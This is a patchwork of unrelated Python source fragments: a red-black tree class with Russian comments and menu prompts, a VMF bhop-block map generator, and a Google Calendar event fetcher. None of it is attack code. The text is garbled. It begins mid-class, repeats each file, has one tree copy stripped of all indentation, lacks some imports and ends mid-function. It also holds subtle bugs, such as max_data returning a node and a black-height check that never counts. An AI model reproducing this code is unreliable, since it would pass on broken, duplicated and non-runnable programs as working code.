        if node.leftChild == self.nil or node.rightChild == self.nil:
            y_node = node
        else:
            y_node = node.rightChild
            while y_node.leftChild != self.nil:
                y_node = y_node.leftChild
        # x is y_node's only (possibly sentinel) child; splice it in place.
        if y_node.leftChild != self.nil:
            x = y_node.leftChild
        else:
            x = y_node.rightChild
        x._parent = y_node.parent
        # NOTE(review): truthiness test here, while the rest of the class
        # compares against self.nil — confirm the sentinel is falsy.
        if y_node.parent:
            if y_node == y_node.parent.leftChild:
                y_node.parent._leftChild = x
            else:
                y_node.parent._rightChild = x
        else:
            self._root = x
        if y_node != node:
            # Successor case: move the successor's key into *node*.
            node._data = y_node.data
        if y_node.color == c.BLACK:
            # Removing a black node may break the black-height invariant.
            self._delete_fix(x)
    def _delete_fix(self, node):
        """Restore red-black properties after removing a black node."""
        c = Color.Color()
        while node.color == c.BLACK and node != self.root:
            b = self._brother(node)
            if b.color == c.RED:
                # Case 1: red sibling — recolor and rotate toward *node*.
                b._color = c.BLACK
                node.parent._color = c.RED
                self._turn_left(node.parent) if node == node.parent.leftChild else self._turn_right(node.parent)
                b = self._brother(node)
            if b.leftChild.color == c.BLACK and b.rightChild.color == c.BLACK:
                # Case 2: black sibling, two black children — recolor and
                # push the "double black" one level up.
                b._color = c.RED
                node = node.parent
            else:
                if node == node.parent.leftChild:
                    if b.rightChild.color == c.BLACK:
                        # Case 3: sibling's near child red — rotate it up.
                        b.leftChild._color = c.BLACK
                        b._color = c.RED
                        self._turn_right(b)
                        b = self._brother(node)
                else:
                    # Mirror of case 3 for a right-side *node*.
                    if b.leftChild.color == c.BLACK:
                        b.rightChild._color = c.BLACK
                        b._color = c.RED
                        self._turn_left(b)
                        b = self._brother(node)
                # Case 4: sibling's far child red — rotate and terminate.
                b._color = node.parent.color
                node.parent._color = c.BLACK
                if node == node.parent.leftChild:
                    b.rightChild._color = c.BLACK
                    self._turn_left(node.parent)
                else:
                    b.leftChild._color = c.BLACK
                    self._turn_right(node.parent)
                node = self.root
        node._color = c.BLACK
    def find(self, data, node=None):
        """Return the node whose key equals *data*, or the NIL sentinel."""
        if node is None:
            node = self.root
        while node != self.nil and data != node.data:
            if data < node.data:
                node = node.leftChild
            else:
                node = node.rightChild
        return node
    def add_data(self, data):
        """Create a node for *data* via the factory and insert it."""
        self.add_node(self._new_node(data=data))
    def add_node(self, node):
        """Insert *node* (standard BST insert, then red-black fixup)."""
        c = Color.Color()
        par = self.nil
        ch = self.root
        # Walk down to the leaf position; ``par`` trails one level behind.
        while ch != self.nil:
            par = ch
            if node.data < ch.data:
                ch = ch.leftChild
            else:
                ch = ch.rightChild
        node._parent = par
        if par == self.nil:
            self._root = node
        elif node.data < par.data:
            par._leftChild = node
        else:
            par._rightChild = node
        node._leftChild = self.nil
        node._rightChild = self.nil
        node._color = c.RED  # new nodes start red; fixup restores invariants
        self._add_fix(node)
    def _add_fix(self, node):
        """Restore red-black properties after inserting a red node."""
        c = Color.Color()
        # Loop while the parent is red (color truthy == red).
        while node.parent.color:
            u = self._uncle(node)
            if u.color:
                # Red uncle: recolor parent/uncle/grandparent, move up.
                node.parent._color = c.BLACK
                u._color = c.BLACK
                self._grandfather(node)._color = c.RED
                node = self._grandfather(node)
            else:
                if node.parent == node.parent.parent.leftChild:
                    if node == node.parent.rightChild:
                        # Inner child: rotate into the outer configuration.
                        node = node.parent
                        self._turn_left(node)
                    node.parent._color = c.BLACK
                    self._grandfather(node)._color = c.RED
                    self._turn_right(self._grandfather(node))
                else:
                    # Mirror image of the branch above.
                    if node == node.parent.leftChild:
                        node = node.parent
                        self._turn_right(node)
                    node.parent._color = c.BLACK
                    self._grandfather(node)._color = c.RED
                    self._turn_left(self._grandfather(node))
        self.root._color = c.BLACK  # the root is always black
    def tree_black_height(self):
        """Count black nodes down the leftmost path (sentinel included)."""
        node = self.root
        count = 0
        while node is not None:
            if not node.color or node == self.nil:
                count += 1
            node = node.leftChild
        return count
    def tree_height(self, node=None, l_height=0, r_height=0):
        """Return the height (in nodes) of *node*'s subtree, recursively.

        NOTE(review): recursion stops only when children are ``None``, so
        the NIL sentinel itself is counted as a level — confirm intended.
        """
        if node is None:
            node = self.root
        if node.leftChild is None and node.rightChild is None:
            return 1
        else:
            if node.leftChild is not None:
                l_height = self.tree_height(node.leftChild, l_height, r_height)
            if node.rightChild is not None:
                r_height = self.tree_height(node.rightChild, l_height, r_height)
            if l_height > r_height:
                return l_height + 1
            else:
                return r_height + 1
    def _turn_left(self, node):
        """Left-rotate around *node*: its right child takes its place."""
        ch = node.rightChild
        node._rightChild = ch.leftChild
        if ch.leftChild != self.nil:
            ch.leftChild._parent = node
        ch._parent = node.parent
        if node.parent == self.nil:
            self._root = ch
        elif node == node.parent.leftChild:
            node.parent._leftChild = ch
        else:
            node.parent._rightChild = ch
        ch._leftChild = node
        node._parent = ch
    def _turn_right(self, node):
        """Right-rotate around *node*: its left child takes its place."""
        ch = node.leftChild
        node._leftChild = ch.rightChild
        if ch.rightChild != self.nil:
            ch.rightChild._parent = node
        ch._parent = node.parent
        if node.parent == self.nil:
            self._root = ch
        elif node == node.parent.rightChild:
            node.parent._rightChild = ch
        else:
            node.parent._leftChild = ch
        ch._rightChild = node
        node._parent = ch
    def check_prop(self):
        """Return True if the red-black invariants appear to hold."""
        def check(x):
            # A node must have either two child links or none.
            if (x.leftChild and not x.rightChild) or (x.rightChild and not x.leftChild):
                return 0, False
            # A childless node that is red is invalid.
            if not x.leftChild and not x.rightChild and x.color:
                return 0, False
            # A red node must not have a red child.
            if x.color and x.leftChild and x.rightChild:
                if x.leftChild.color or x.rightChild.color:
                    return 0, False
            if x.leftChild and x.rightChild:
                # Parent links must be consistent for real children.
                if x.leftChild != self.nil and x != x.leftChild.parent:
                    return 0, False
                if x.rightChild != self.nil and x != x.rightChild.parent:
                    return 0, False
                l_count, l_ok = check(x.leftChild)
                if not l_ok:
                    return 0, False
                r_count, r_ok = check(x.rightChild)
                if not r_ok:
                    return 0, False
                if l_count != r_count:
                    return 0, False
                # NOTE(review): the count is never incremented, so the
                # black-height comparison above is always 0 == 0; it was
                # probably meant to add 1 for black nodes — verify.
                return l_count, True
            else:
                return 0, True
        num_black, is_ok = check(self.root)
        return is_ok and not self.root.color
def save(t, f):
    """Serialize tree *t* to the open text stream *f* in pre-order."""

    def color_name(n):
        # colors are truthy for red, falsy for black
        return "RED" if n.color else "BLACK"

    def dump(n):
        # emit this node, then recurse into its real (non-sentinel) children
        f.write(" data=\"%s\", color=\"%s\" \t[" % (n, color_name(n)))
        if n.leftChild != t.nil:
            f.write("leftChild = \"%s\" " % (n.leftChild))
        if n.rightChild != t.nil:
            f.write("rightChild = \"%s\"" % (n.rightChild))
        f.write("]")
        f.write("\n")
        if n.leftChild and n.leftChild != t.nil:
            dump(n.leftChild)
        if n.rightChild and n.rightChild != t.nil:
            dump(n.rightChild)

    f.write("Red black tree" + '\n')
    dump(t.root)
def test_add(t):
    """Insert a fixed key sequence one at a time, checking RB invariants."""
    for key in [5, 3, 6, 7, 2, 4, 21, 8, 99, 9, 32, 23]:
        t.add_data(key)
        assert t.check_prop()
def test_min_max(t):
    """Populate *t* and print subtree min/max for several probe keys."""
    for key in [5, 3, 6, 7, 2, 4, 21, 8, 99, 9, 32, 23]:
        t.add_data(key)
    for probe in [5, 3, 21, 10, 32]:
        found = t.find(probe)
        if found.data is not None:
            print("максимум в поддереве узла", probe, " = ", t.max_data(found))
            print("минимум в поддереве узла", probe, " = ", t.min_data(found))
            print("")
        else:
            print("нет узла", probe, "в дереве")
            print("")
def test_find(t):
    """Report which probe keys are present in the tree."""
    for key in [5, 3, 6, 7, 2, 4, 21, 8, 99, 9, 32, 23]:
        t.add_data(key)
    for probe in [6, 3, 24, 23, 99, 101]:
        present = t.find(probe).data is not None
        if present:
            print("data", probe, "exists")
        else:
            print("data", probe, "is not exist")
def test_random_insert(t, s):
    """Insert *s* distinct random keys below 2000, checking invariants."""
    max_data = 2000
    r.seed(2)
    for key in list(r.SystemRandom().sample(range(max_data), s)):
        t.add_data(key)
        assert t.check_prop()
def test_delete(t):
    """Insert fixed keys, delete a few, print survivors, check invariants."""
    keys = [5, 3, 6, 7, 2, 4, 21, 8, 99, 9, 32, 23]
    for key in keys:
        t.add_data(key)
    for victim in [3, 21, 7, 32]:
        t.delete_data(victim)
    for key in keys:
        if t.find(key).data is not None:
            print("%d" % key, end=' ')
    print("")
    assert t.check_prop()
if '__main__' == __name__:
    import os
    import random as r

    def save_tree(tree, filename):
        """Write *tree* to <filename>.txt and invoke the external viewer."""
        # Fix: context manager guarantees the file is flushed and closed
        # before the external command reads it (was open/close by hand).
        with open('%s.txt' % filename, 'w') as f:
            save(tree, f)
        os.system('txt %s.txt -T' % filename)

    r.seed(2)
    t = RBTree()
    # Interactive menu (prompts kept verbatim).
    print("Введите цифру 1, если хотите построить дерево со случайным набором ключей и определить его высоту")
    print("Введите цифру 2, если хотите построить дерево с заданным набором ключей, чтобы проверить вставку")
    print("Введите цифру 3, если хотите протестировать удаление узлов")
    print("Введите цифру 4, если хотите протестировать max и min")
    print("Введите цифру 5, если хотите протестировать поиск")
    a = int(input())
    if a == 1:
        # Build 1000 random trees per size and average their heights.
        for size in range(30, 101, 10):
            h_1, h_2, hh_1, hh_2, c_1, c_2, c_3, c_4 = 0, 0, 0, 0, 0, 0, 0, 0
            for i in range(1000):
                t = RBTree()
                test_random_insert(t, size)
                if i == 0:
                    h_1 = t.tree_height()
                    h_2 = t.tree_black_height()
                if t.tree_height() == h_1:
                    c_1 += 1
                else:
                    hh_1 = t.tree_height()
                    c_2 += 1
                if t.tree_black_height() == h_2:
                    c_3 += 1
                else:
                    hh_2 = t.tree_black_height()
                    c_4 += 1
            print("----------")
            print("Количество ключей = %d" % size)
            # NOTE(review): the averages assume at most two distinct height
            # values occur across the 1000 trees — confirm that premise.
            print("Средняя черн высота дерева = %f" % ((h_2 * c_3 + hh_2 * c_4) / 1000))
            print("Средняя высота дерева = %f" % ((h_1 * c_1 + hh_1 * c_2) / 1000))
    elif a == 2:
        test_add(t)
    elif a == 3:
        test_delete(t)
    elif a == 4:
        test_min_max(t)
    elif a == 5:
        test_find(t)
    # Fix: dataset-extraction junk fused onto this final line removed.
    save_tree(t, 'tree')
import node
class RBTree(object):
RBNode = node.RBNode
def __init__(self, new_node=RBNode):
"""setters"""
self._nil = new_node(data=None) # Листья нули и всегда черны
self._root = self.nil # В начале корень нулевой
self._new_node = new_node # вызов, создающий узел
"""getters"""
@property
def root(self):
return self._root
@property
def nil(self):
return self._nil
def _grandfather(self, node): # возвращает дедушку узла
if node != self.nil and node.parent != self.nil:
return node.parent.parent
else:
return self.nil # mb None
def _uncle(self, node): # возвращает дядю узла
g = self._grandfather(node)
if g == self.nil:
return self.nil
else:
if node.parent == g.leftChild:
return g.rightChild
else:
return g.leftChild
def _brother(self, node): # возвращает правого или левого брата
assert node.parent != self.nil
if node == node.parent.leftChild:
return node.parent.rightChild
else:
return node.parent.leftChild
def min_data(self, node=None): # Находит минимум в поддереве узла х
if node is None:
node = self.root
while node.leftChild != self.nil:
node = node.leftChild
return node.data
def max_data(self, node=None): # Находит максимум в поддереве узла х
if node is None:
node = self.root
while node.rightChild != self.nil:
node = node.rightChild
return node
def delete_data(self, data): # вызывает операцию удаления для узла с параметром data
node = self.find(data)
if node == self.nil:
return False
self.delete_node(node)
return True
def delete_node(self, node):
c = Color.Color()
if not node or node == self.nil:
return
if node.leftChild == self.nil or node.rightChild == self.nil:
y_node = node
else:
y_node = node.rightChild
while y_node.leftChild != self.nil:
y_node = y_node.leftChild
if y_node.leftChild != self.nil:
x = y_node.leftChild
else:
x = y_node.rightChild
x._parent = y_node.parent
if y_node.parent:
if y_node == y_node.parent.leftChild:
y_node.parent._leftChild = x
else:
y_node.parent._rightChild = x
else:
self._root = x
if y_node != node:
node._data = y_node.data
if y_node.color == c.BLACK:
self._delete_fix(x)
def _delete_fix(self, node):
c = Color.Color()
while node.color == c.BLACK and node != self.root:
b = self._brother(node)
if b.color == c.RED:
b._color = c.BLACK
node.parent._color = c.RED
self._turn_left(node.parent) if node == node.parent.leftChild else self._turn_right(node.parent)
b = self._brother(node)
if b.leftChild.color == c.BLACK and b.rightChild.color == c.BLACK:
b._color = c.RED
node = node.parent
else:
if node == node.parent.leftChild:
if b.rightChild.color == c.BLACK:
b.leftChild._color = c.BLACK
b._color = c.RED
self._turn_right(b)
b = self._brother(node)
else:
if b.leftChild.color == c.BLACK:
b.rightChild._color = c.BLACK
b._color = c.RED
self._turn_left(b)
b = self._brother(node)
b._color = node.parent.color
node.parent._color = c.BLACK
if node == node.parent.leftChild:
b.rightChild._color = c.BLACK
self._turn_left(node.parent)
else:
b.leftChild._color = c.BLACK
self._turn_right(node.parent)
node = self.root
node._color = c.BLACK
def find(self, data, node=None): # находит узел с параметром data, если такой есть
if node is None:
node = self.root
while node != self.nil and data != node.data:
if data < node.data:
node = node.leftChild
else:
node = node.rightChild
return node
def add_data(self, data):
self.add_node(self._new_node(data=data))
def add_node(self, node): # добавление узла node в дерево
c = Color.Color()
par = self.nil
ch = self.root
while ch != self.nil:
par = ch
if node.data < ch.data:
ch = ch.leftChild
else:
ch = ch.rightChild
node._parent = par
if par == self.nil:
self._root = node
elif node.data < par.data:
par._leftChild = node
else:
par._rightChild = node
node._leftChild = self.nil
node._rightChild = self.nil
node._color = c.RED
self._add_fix(node)
def _add_fix(self, node): # восстановление свойств красно-черного дерева
c = Color.Color()
while node.parent.color:
u = self._uncle(node)
if u.color:
node.parent._color = c.BLACK
u._color = c.BLACK
self._grandfather(node)._color = c.RED
node = self._grandfather(node)
else:
if node.parent == node.parent.parent.leftChild:
if node == node.parent.rightChild:
node = node.parent
self._turn_left(node)
node.parent._color = c.BLACK
self._grandfather(node)._color = c.RED
self._turn_right(self._grandfather(node))
else:
if node == node.parent.leftChild:
node = node.parent
self._turn_right(node)
node.parent._color = c.BLACK
self._grandfather(node)._color = c.RED
self._turn_left(self._grandfather(node))
self.root._color = c.BLACK
def tree_black_height(self):
node = self.root
count = 0
while node is not None:
if not node.color or node == self.nil:
count += 1
node = node.leftChild
return count
def tree_height(self, node=None, l_height=0, r_height=0):
if node is None:
node = self.root
if node.leftChild is None and node.rightChild is None:
return 1
else:
if node.leftChild is not None:
l_height = self.tree_height(node.leftChild, l_height, r_height)
if node.rightChild is not None:
r_height = self.tree_height(node.rightChild, l_height, r_height)
if l_height > r_height:
return l_height + 1
else:
return r_height + 1
def _turn_left(self, node): # выполнить левый поворот узла
ch = node.rightChild
node._rightChild = ch.leftChild
if ch.leftChild != self.nil:
ch.leftChild._parent = node
ch._parent = node.parent
if node.parent == self.nil:
self._root = ch
elif node == node.parent.leftChild:
node.parent._leftChild = ch
else:
node.parent._rightChild = ch
ch._leftChild = node
node._parent = ch
def _turn_right(self, node): # выполнить правый поворот узла
ch = node.leftChild
node._leftChild = ch.rightChild
if ch.rightChild != self.nil:
ch.rightChild._parent = node
ch._parent = node.parent
if node.parent == self.nil:
self._root = ch
elif node == node.parent.rightChild:
node.parent._rightChild = ch
else:
node.parent._leftChild = ch
ch._rightChild = node
node._parent = ch
def check_prop(self): # returns True if RBTree is ok
def check(x):
if (x.leftChild and not x.rightChild) or (x.rightChild and not x.leftChild):
return 0, False
if not x.leftChild and not x.rightChild and x.color:
return 0, False
if x.color and x.leftChild and x.rightChild:
if x.leftChild.color or x.rightChild.color:
return 0, False
if x.leftChild and x.rightChild:
if x.leftChild != self.nil and x != x.leftChild.parent:
return 0, False
if x.rightChild != self.nil and x != x.rightChild.parent:
return 0, False
l_count, l_ok = check(x.leftChild)
if not l_ok:
return 0, False
r_count, r_ok = check(x.rightChild)
if not r_ok:
return 0, False
if l_count != r_count:
return 0, False
return l_count, True
else:
return 0, True
num_black, is_ok = check(self.root)
return is_ok and not self.root.color
def save(t, f,): # writing file in a file f.dot
def node_c(x):
if x.color:
return "RED"
else:
return "BLACK"
def writing(x): # BFA pre-order search
f.write(" data=\"%s\", color=\"%s\" \t[" % (x, node_c(x)))
if x.leftChild != t.nil:
f.write("leftChild = \"%s\" " % (x.leftChild))
if x.rightChild != t.nil:
f.write("rightChild = \"%s\"" % (x.rightChild))
f.write("]")
f.write("\n")
if x.leftChild:
if x.leftChild != t.nil:
writing(x.leftChild)
if x.rightChild:
if x.rightChild != t.nil:
writing(x.rightChild)
f.write("Red black tree" + '\n')
writing(t.root)
def test_add(t): # Insert datas one by one checking prop
datas = [5, 3, 6, 7, 2, 4, 21, 8, 99, 9, 32, 23]
for i, data in enumerate(datas):
t.add_data(data)
assert t.check_prop()
def test_min_max(t):
datas = [5, 3, 6, 7, 2, 4, 21, 8, 99, 9, 32, 23]
m_datas = [5, 3, 21, 10, 32]
for i, data in enumerate(datas):
t.add_data(data)
for i, m_data in enumerate(m_datas):
if t.find(m_data).data is not None:
print("максимум в поддереве узла", m_data, " = ", t.max_data(t.find(m_data)))
print("минимум в поддереве узла", m_data, " = ", t.min_data(t.find(m_data)))
print("")
else:
print("нет узла", m_data, "в дереве")
print("")
def test_find(t):
    """Build a fixed tree and report which probe keys are present."""
    for key in [5, 3, 6, 7, 2, 4, 21, 8, 99, 9, 32, 23]:
        t.add_data(key)
    for probe in [6, 3, 24, 23, 99, 101]:
        found = t.find(probe).data is not None
        print("data", probe, "exists" if found else "is not exist")
def test_random_insert(t, s):
    """Insert s distinct random keys from [0, 2000) and validate RB properties.

    BUG FIX: the original called r.seed(2) and then sampled via
    random.SystemRandom(), which draws from the OS entropy source and
    ignores seeding entirely — the seed call was dead code and runs were
    not reproducible. Sampling with the module RNG honors the seed set by
    the caller (the __main__ block seeds once), while successive calls
    still produce different trees.
    """
    max_data = 2000
    rand_datas = r.sample(range(max_data), s)
    for data in rand_datas:
        t.add_data(data)
        assert t.check_prop()
def test_delete(t):
    """Insert a fixed key set, delete some keys, print survivors, re-validate."""
    keys = [5, 3, 6, 7, 2, 4, 21, 8, 99, 9, 32, 23]
    for key in keys:
        t.add_data(key)
    for doomed in [3, 21, 7, 32]:
        t.delete_data(doomed)
    for key in keys:
        if t.find(key).data is not None:
            print("%d" % key, end=' ')
    print("")
    assert t.check_prop()
if '__main__' == __name__:
    import os
    import random as r

    def save_tree(tree, filename):
        """Serialize *tree* to <filename>.txt and hand the file to the viewer."""
        f = open('%s.txt' % filename, 'w')
        save(tree, f)
        f.close()
        os.system('txt %s.txt -T' % filename)

    r.seed(2)
    t = RBTree()
    print("Введите цифру 1, если хотите построить дерево со случайным набором ключей и определить его высоту")
    print("Введите цифру 2, если хотите построить дерево с заданным набором ключей, чтобы проверить вставку")
    print("Введите цифру 3, если хотите протестировать удаление узлов")
    print("Введите цифру 4, если хотите протестировать max и min")
    print("Введите цифру 5, если хотите протестировать поиск")
    a = int(input())
    if a == 1:
        for size in range(30, 101, 10):
            # BUG FIX: the original remembered only the first height seen plus a
            # single alternative value (h_1/hh_1 with counters), so the printed
            # "average" was wrong whenever the 1000 trees took three or more
            # distinct heights. Accumulating plain sums is always correct.
            height_sum = 0
            black_height_sum = 0
            for _ in range(1000):
                t = RBTree()
                test_random_insert(t, size)
                height_sum += t.tree_height()
                black_height_sum += t.tree_black_height()
            print("----------")
            print("Количество ключей = %d" % size)
            print("Средняя черн высота дерева = %f" % (black_height_sum / 1000))
            print("Средняя высота дерева = %f" % (height_sum / 1000))
    elif a == 2:
        test_add(t)
    elif a == 3:
        test_delete(t)
    elif a == 4:
        test_min_max(t)
    elif a == 5:
        test_find(t)
    save_tree(t, 'tree')
from model.Vmf import Vmf
from model.Vertex import Vertex
import numpy as np
import random
def alg_bhop_concatenation(vmf: Vmf):
    """Grow a chain of bhop blocks: repeatedly spawn a new solid at a random
    point around the current block and step onto each successfully placed one.

    Terminates after n placed blocks, or after fail_seq_max consecutive
    failed placement attempts.
    """
    # cfg
    n = 4000                    # target number of placed blocks
    min_size = 64               # block footprint (x/y half-extent)
    assert min_size > 8
    max_size = 128              # size of the starting (root) solid
    fail_seq_max = 100          # give up after this many consecutive failures
    block_min_distance = 256    # extra sampling radius around the current block
    block_xr = min_size
    block_yr = min_size
    block_zr = min_size / 4
    i = 0
    fail_seq_nr = 0
    root = vmf.gen_solid(Vertex(0, 0, 12000), max_size, max_size, max_size)
    solid = root
    vmf.add_solid(solid.origin, solid.xr, solid.yr, solid.zr)
    # BUG FIX: the original condition was `i < n or fail_seq_nr >= fail_seq_max`,
    # which keeps the loop alive forever once the failure cap is reached —
    # the cap is meant to terminate the loop.
    while i < n and fail_seq_nr < fail_seq_max:
        skip = False
        # debug
        print(f'{i} / {n}')
        # sample a point uniformly inside a sphere of radius R around the block
        R = solid.radius + block_min_distance
        phi = random.uniform(0, 2*np.pi)
        costheta = random.uniform(-1, 1)
        u = random.uniform(0, 1)
        theta = np.arccos(costheta)
        r = R * np.cbrt(u)
        x = r * np.sin(theta) * np.cos(phi)
        y = r * np.sin(theta) * np.sin(phi)
        z = r * np.cos(theta)
        # snap z to an even grid coordinate
        new_solid_z = int(solid.origin.z + z)
        if new_solid_z % 2 != 0:
            new_solid_z = new_solid_z + 1
        # only allow blocks at the same height or up to 32 units lower
        if (new_solid_z > solid.origin.z) or (new_solid_z < solid.origin.z - 32):
            skip = True
        if not skip:
            new_solid_x = int(solid.origin.x + x)
            if new_solid_x % 2 != 0:
                new_solid_x = new_solid_x + 1
            new_solid_y = int(solid.origin.y + y)
            if new_solid_y % 2 != 0:
                new_solid_y = new_solid_y + 1
            add_success = vmf.add_solid(Vertex(new_solid_x, new_solid_y, new_solid_z), block_xr,
                                        block_yr, block_zr, checkCollisionType=2, material="realworldtextures2/marble/marble_02")
            if add_success:
                i = i + 1
                fail_seq_nr = 0
                # continue on the newly placed solid
                solid = vmf.gen_solid(
                    Vertex(new_solid_x, new_solid_y, new_solid_z), block_xr, block_yr, block_zr)
            else:
                fail_seq_nr = fail_seq_nr + 1
from model.Vertex import Vertex
import numpy as np
import random
def alg_bhop_concatenation(vmf: Vmf):
    """Grow a chain of bhop blocks: repeatedly spawn a new solid at a random
    point around the current block and step onto each successfully placed one.

    Terminates after n placed blocks, or after fail_seq_max consecutive
    failed placement attempts.
    """
    # cfg
    n = 4000                    # target number of placed blocks
    min_size = 64               # block footprint (x/y half-extent)
    assert min_size > 8
    max_size = 128              # size of the starting (root) solid
    fail_seq_max = 100          # give up after this many consecutive failures
    block_min_distance = 256    # extra sampling radius around the current block
    block_xr = min_size
    block_yr = min_size
    block_zr = min_size / 4
    i = 0
    fail_seq_nr = 0
    root = vmf.gen_solid(Vertex(0, 0, 12000), max_size, max_size, max_size)
    solid = root
    vmf.add_solid(solid.origin, solid.xr, solid.yr, solid.zr)
    # BUG FIX: the original condition was `i < n or fail_seq_nr >= fail_seq_max`,
    # which keeps the loop alive forever once the failure cap is reached —
    # the cap is meant to terminate the loop.
    while i < n and fail_seq_nr < fail_seq_max:
        skip = False
        # debug
        print(f'{i} / {n}')
        # sample a point uniformly inside a sphere of radius R around the block
        R = solid.radius + block_min_distance
        phi = random.uniform(0, 2*np.pi)
        costheta = random.uniform(-1, 1)
        u = random.uniform(0, 1)
        theta = np.arccos(costheta)
        r = R * np.cbrt(u)
        x = r * np.sin(theta) * np.cos(phi)
        y = r * np.sin(theta) * np.sin(phi)
        z = r * np.cos(theta)
        # snap z to an even grid coordinate
        new_solid_z = int(solid.origin.z + z)
        if new_solid_z % 2 != 0:
            new_solid_z = new_solid_z + 1
        # only allow blocks at the same height or up to 32 units lower
        if (new_solid_z > solid.origin.z) or (new_solid_z < solid.origin.z - 32):
            skip = True
        if not skip:
            new_solid_x = int(solid.origin.x + x)
            if new_solid_x % 2 != 0:
                new_solid_x = new_solid_x + 1
            new_solid_y = int(solid.origin.y + y)
            if new_solid_y % 2 != 0:
                new_solid_y = new_solid_y + 1
            add_success = vmf.add_solid(Vertex(new_solid_x, new_solid_y, new_solid_z), block_xr,
                                        block_yr, block_zr, checkCollisionType=2, material="realworldtextures2/marble/marble_02")
            if add_success:
                i = i + 1
                fail_seq_nr = 0
                # continue on the newly placed solid
                solid = vmf.gen_solid(
                    Vertex(new_solid_x, new_solid_y, new_solid_z), block_xr, block_yr, block_zr)
            else:
                fail_seq_nr = fail_seq_nr + 1
import datetime
from typing import Any, Iterable, Iterator
import logging
import googleapiclient.discovery
import google.oauth2.service_account
import model
import config
# If modifying these scopes, delete the file token.json.
_API_SCOPES = ["https://www.googleapis.com/auth/calendar.readonly"]
log = logging.getLogger()
def _get_api_credentials(
    scopes: Iterable[str],
) -> google.oauth2.service_account.Credentials:
    """Get the credentials used to Google Oauth

    Args:
        scopes - A list of the scopes that will be available through
            the returned credentials

    Returns:
        The credentials object used to authenticate
    """
    path_to_creds = config.PROJECT_DIR / "secrets/calendar-fetcher-creds.json"
    # Typo fix: the log message previously read "crendetials".
    log.debug("Creating API credentials from file '%s'", path_to_creds)
    return google.oauth2.service_account.Credentials.from_service_account_file(
        path_to_creds,
        scopes=scopes,
    )
def _format_as_zulu_date(date: datetime.datetime) -> str:
return f"{date.isoformat()}Z"
def _replace_with_first_day_of_the_year(date: datetime.datetime) -> datetime.datetime:
return date.replace(
month=1,
day=1,
hour=0,
minute=0,
second=0,
microsecond=0,
)
def retrieve_past_year_events() -> Iterator[model.CalendarEvent]:
    """Retrieves the events that have taken place since the start of the current year

    Raises:
        googleapiclient.errors.HttpError
    """
    log.debug("Retrieving past year events")
    now = datetime.datetime.utcnow()
    year_start = _replace_with_first_day_of_the_year(now)
    yield from retrieve_events(start_date=year_start, end_date=now)
def retrieve_current_year_events() -> Iterator[model.CalendarEvent]:
    """Retrieves all of the current year events

    Yields events from January 1st of the current year (inclusive) up to
    January 1st of the next year.

    Raises:
        googleapiclient.errors.HttpError
    """
    log.debug("Retrieving current year events")
    current_time = datetime.datetime.utcnow()
    start_date = _replace_with_first_day_of_the_year(current_time)
    # BUG FIX: bump the year only after truncating to January 1st. The
    # original called current_time.replace(year=...) on the full timestamp,
    # which raises ValueError when run on February 29th of a leap year
    # (Feb 29 does not exist in the following year).
    end_date = start_date.replace(year=start_date.year + 1)
    yield from retrieve_events(start_date=start_date, end_date=end_date)
def retrieve_events(
    start_date: datetime.datetime, end_date: datetime.datetime
) -> Iterator[model.CalendarEvent]:
    """Retrieves the events that have taken place between `start_date` and `end_date`

    Args:
        start_date: inclusive lower bound; naive datetime, formatted as UTC ("Z")
        end_date: upper bound; naive datetime, formatted as UTC ("Z")

    Returns:
        Lazily-mapped CalendarEvent objects (map over the API's "items" list).

    Raises:
        googleapiclient.errors.HttpError
    """
    log.info("Retrieving events from %s to %s", start_date, end_date)
    # Build a Calendar API client authenticated with the service account.
    service = googleapiclient.discovery.build(
        "calendar", "v3", credentials=_get_api_credentials(_API_SCOPES)
    )
    # singleEvents=True expands recurring events into individual instances;
    # the Calendar API requires this for orderBy="startTime".
    event_dicts: Iterator[dict[str, Any]] = (
        service.events()
        .list(
            calendarId=config.secret_config["calendarId"],
            timeMin=_format_as_zulu_date(start_date),
            timeMax=_format_as_zulu_date(end_date),
            singleEvents=True,
            orderBy="startTime",
        )
        .execute()
        .get("items", tuple())
    )
    return map(model.CalendarEvent.from_dict, event_dicts)
if __name__ == "__main__":
    from pprint import pprint

    # BUG FIX: retrieve_past_year_events() is a generator, so pprint would
    # only print its repr. Materialize it so the events themselves are shown.
    pprint(list(retrieve_past_year_events()))
from typing import Any, Iterable, Iterator
import logging
import googleapiclient.discovery
import google.oauth2.service_account
import model
import config
# If modifying these scopes, delete the file token.json.
_API_SCOPES = ["https://www.googleapis.com/auth/calendar.readonly"]
log = logging.getLogger()
def _get_api_credentials(
    scopes: Iterable[str],
) -> google.oauth2.service_account.Credentials:
    """Get the credentials used to Google Oauth

    Args:
        scopes - A list of the scopes that will be available through
            the returned credentials

    Returns:
        The credentials object used to authenticate
    """
    path_to_creds = config.PROJECT_DIR / "secrets/calendar-fetcher-creds.json"
    # Typo fix: the log message previously read "crendetials".
    log.debug("Creating API credentials from file '%s'", path_to_creds)
    return google.oauth2.service_account.Credentials.from_service_account_file(
        path_to_creds,
        scopes=scopes,
    )
def _format_as_zulu_date(date: datetime.datetime) -> str:
return f"{date.isoformat()}Z"
def _replace_with_first_day_of_the_year(date: datetime.datetime) -> datetime.datetime:
return date.replace(
month=1,
day=1,
hour=0,
minute=0,
second=0,
microsecond=0,
)
def retrieve_past_year_events() -> Iterator[model.CalendarEvent]:
    """Retrieves the events that have taken place since the start of the current year

    Raises:
        googleapiclient.errors.HttpError
    """
    log.debug("Retrieving past year events")
    now = datetime.datetime.utcnow()
    year_start = _replace_with_first_day_of_the_year(now)
    yield from retrieve_events(start_date=year_start, end_date=now)
def retrieve_current_year_events() -> Iterator[model.CalendarEvent]:
    """Retrieves all of the current year events

    Yields events from January 1st of the current year (inclusive) up to
    January 1st of the next year.

    Raises:
        googleapiclient.errors.HttpError
    """
    log.debug("Retrieving current year events")
    current_time = datetime.datetime.utcnow()
    start_date = _replace_with_first_day_of_the_year(current_time)
    # BUG FIX: bump the year only after truncating to January 1st. The
    # original called current_time.replace(year=...) on the full timestamp,
    # which raises ValueError when run on February 29th of a leap year
    # (Feb 29 does not exist in the following year).
    end_date = start_date.replace(year=start_date.year + 1)
    yield from retrieve_events(start_date=start_date, end_date=end_date)
def retrieve_events(
    start_date: datetime.datetime, end_date: datetime.datetime
) -> Iterator[model.CalendarEvent]:
    """Retrieves the events that have taken place between `start_date` and `end_date`

    Args:
        start_date: inclusive lower bound; naive datetime, formatted as UTC ("Z")
        end_date: upper bound; naive datetime, formatted as UTC ("Z")

    Returns:
        Lazily-mapped CalendarEvent objects (map over the API's "items" list).

    Raises:
        googleapiclient.errors.HttpError
    """
